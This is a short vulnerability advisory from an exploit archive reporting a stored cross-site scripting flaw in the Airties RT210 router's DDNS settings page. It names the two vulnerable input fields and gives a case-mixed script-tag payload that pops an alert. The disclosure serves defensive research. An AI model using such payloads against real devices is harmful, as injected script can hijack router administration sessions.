Airties RT210 Cross Site Scripting

2015-06-05T00:00:00
ID PACKETSTORM:132178
Type packetstorm
Reporter B3mB4m
Modified 2015-06-05T00:00:00

Description

                                        
                                            `Airties RT210 Web Interface Stored XSS Vulnerability  
  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Discovered by: B3mB4m  
[~] Contact : b3mb4m@gmail.com  
[+] Greetz : SYS & & KnocKout & Septemb0x  
############################################################  
  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Hardware/Web App : Airties  
|~Affected Version : AirRT210  
|~Official Web: http://www.airties.com  
|~RISK : Hight  
  
----------------------------------------------------------  
Proof video: https://www.youtube.com/watch?v=OOZwGeG8p3M  
----------------------------------------------------------  
Post  
----------------------------------------------------------  
Vul Link : http://192.168.2.1/ddns.stm  
  
1) <input maxlength="49" size="50" name="ddns_domainame" value="">  
2) <input maxlength="49" size="50" name="ddns_account" value="">  
  
Payload : '"><SCrIpT>alert("B3mB4m")</ScRiPt>  
`